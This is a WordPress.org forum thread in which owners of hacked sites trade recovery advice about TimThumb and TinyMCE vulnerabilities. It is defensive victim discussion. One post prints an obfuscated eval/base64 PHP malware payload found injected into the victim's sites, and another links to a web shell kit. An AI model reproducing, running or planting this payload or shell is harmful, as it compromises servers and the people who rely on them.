WordPress.org

Ready to get started?Download WordPress

Forums

Site has been hacked (19 posts)

  1. veejay
    Member
    Posted 2 years ago #

    WordPress.org does not recognize me at all - not my email address, my username, or my password. My host took my site back from theme eleven to default after my site had been cmpletely taken over by a hacker.
    The blog is still there, but I cannot get in as administrator.
    Do I start all over again. If I have to start from scratch how do I do that. By the way there are no sites on my FTP either.
    Help,anybody?

  2. Sage Brownell
    Member
    Posted 2 years ago #

  3. scott22
    Member
    Posted 2 years ago #

    I am a website developer and have been hacked by a people refering themselves as linuxploit crew. I ran my site with sucuri malware scanning software whic is free and told me exactly where to go and was able to delete the items. It effected about a 100 sites so it was quite long to do this. I thought i was throught with this nightmare and now one of my accounts contacted me and said they could not access account. I went in and removed malware again....it was in the index page and in the footer and index of theme. I changed password on filezilla, my hosting company and and my ftp login. I am at a loss and would love any advice! Thank you. All my wordpress sites have the latest versions and all plugins are up to date too. I am only using the most popular plugins as listed my wordpress too. My hosting company is 1and1.com

  4. nettybet
    Member
    Posted 2 years ago #

    I lost twelve sites this week and am devestated. Most current WP and plug-ins and most popular plug-ins at that. My hosting reseller account is with Lonex. I can't change my passwords fast enough to stay ahead of my hacker "Saad" IP Iraq. I use a 64bit system and need advice on malware scanning program.

  5. scott22
    Member
    Posted 2 years ago #

    http://sitecheck.sucuri.net/scanner/ is what i used to scan them and it took me right to the source of the attack. Let me know what is says and i will try to help you.

  6. workingit
    Member
    Posted 2 years ago #

    ditto - I'm in the same boat

    that is "WordPress.org does not recognize me at all - not my email address, my username, or my password. My host took my site back from theme eleven to default after my site had been cmpletely taken over by a hacker.
    The blog is still there, but I cannot get in as administrator."

    I ran through this site as suggested above;
    http://sitecheck.sucuri.net/scanner/

    and no malware or blacklist but rec that I upgrade my wordpress

    I got into my ftp using my web host and am now downloading my site to a folder on my desk top.

    When that is done. what should I do?

  7. scott22
    Member
    Posted 2 years ago #

    Not a expert, if you dont have a backup of your site your server can sometimes can send you a copy of site if done quickly after your site is hacked. You can login to your ftp and load backup copy of site and this should allow you restore site before it was hacked. After you load site, run than scan and see if the malware was in your site before it went down. Good luck!

  8. lorrequer
    Member
    Posted 2 years ago #

    Alas I have to join the ranks of having been hacked this morning. So frustrating. I ran the sitecheck scan and I got back this message:
    Web site defaced.
    Details: http://sucuri.net/malware/entry/MW:DEFACED:01
    <p align="center"><b><font color="red" face="Tahoma">HaCkEd BY Mr.m0r0 MoRoCcAn HaCkEr</font>
    <font color=green>Mr.m0r0 WaS HeRe </h2></font>
    and Malaware detected at http://www.404testpage4525d2fdc

    I presume there is nothing I can do about this. My hosting server wants to take it all down and I can restore from backups.

  9. scott22
    Member
    Posted 2 years ago #

    You could go into your ftp, find that file and look for malware. When you find that file highlight it and hold down and look for view edit, my hacks were usually at bottom of page, it looked totally different from the other code. I erased and then saved. If you have mutiple sites, scan other sites too. Good Luck.

  10. olavxxx
    Member
    Posted 2 years ago #

    Try to google your plugins. TimThumb for one has maaany security flaws..

  11. mannyreyes
    Member
    Posted 2 years ago #

    I also created a thread about been hacked and got ignore. Yes is true and is out there. I have a hosting account and so far 4 of my domains have been hacked. I changed passwords, SQL passwords, email passwords, blocked IP address, etc and they still get in.

    My first site was hacked directly to the root impamting a mijn some ign bank link phishing site. My other sites has been trough tinymce they inject a security.html file.

    My Hosting people keep suspending my accounts and is getting annoying and since they dont know they keep telling me I need to be sure I have the latest updates which I do.

  12. nettybet
    Member
    Posted 2 years ago #

    @Scott, What do you know about a software named "SpyShelter" if anything?

  13. scott22
    Member
    Posted 2 years ago #

    Found out alot today about the flaws in my wordpress themes and the root of my hack. They enter my server through the the timthump image resizing tool on alot of wordpress themes. I bought alot of themes from themeforest and many of my sites had this in the themes. I am attaching a article that might help people with this issues. My server helped me find the access point for the hackers. After they had access they soread alware my 110 sites (NIGHTMARE is close to being over) http://www.woothemes.com/2011/08/timthumb-security-flaw-patch/
    This article came from a theme seller so you know many people around the country are experiencing the same thing. And this is what the malware in my site looked like,

    eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

    I hope this helps!

  14. nettybet
    Member
    Posted 2 years ago #

    Wow! Thank you so much Scott. My themes are all from Theme Forest and I went to the link but am not sure how to fix. I have Dynamix and Awake. Can you help? I want to replace these files before new sites get hacked. =)

  15. scott22
    Member
    Posted 2 years ago #

    I use awake and dynamix on several sites, How do you want me to contact you. I could friend you on facebook? How many sites do you have? I think i can help you

  16. mannyreyes
    Member
    Posted 2 years ago #

    I also been working with my hosting people and they did some research. Which two of my sites has been hack and deposit a file under the tinymce folder. Sadly I deleted the folder and the WYSIWYG didnt work well so I uploaded a fresh copy of the folder but it seems that tinymce has a vulnerability as well. Read this out http://seclists.org/fulldisclosure/2011/Nov/427?utm_source=twitterfeed&utm_medium=twitter

  17. Sven D.
    Member
    Posted 2 years ago #

    @ nettybet

    If the hacker at you site always have IPs from Iraq, then it might be an idea to bloch that country in the htaccess file. You can then drop the htacaess-file in the root folder (blocking you whole site for visitors from Iraq) or just put the htaccess-fil in the admin folder to prevent access to that folder for Iraq-IPs.

  18. nettybet
    Member
    Posted 2 years ago #

    @ Sven D.
    Thank you! Their IP information is Win7
    1366x768 Iraq Flag Irbil,
    Arbil,
    Iraq Evdo-subscribers-erbil (109.127.86.97)

    @ Scott
    I will send you private message with contact info. However, did you know their is a TimThumb plug-in to test vulnerability? A friend I forwarded your info to sent me this link: http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/
    Curious what everyone thinks of this plug-in?

  19. essaum
    Member
    Posted 1 year ago #

    I had a similar experience, and i found the kit used with hacker, it was uploaded via vbulletin script security whole or (calender.php , faq.php , search.php)
    this is the shell used with the hacking http://bit.ly/VOYDiI
    its name is: (S a u d i S h 3 l l v1.0)
    you should scan your server for this evil shell, and also scan all the accounts for a file (usually called script.php ) that is plant in many accounts on your server, and delete them all.
    if you don't find the shell, the hacker will be able to use it anytime he want.

Topic Closed

This topic has been closed to new replies.

About this Topic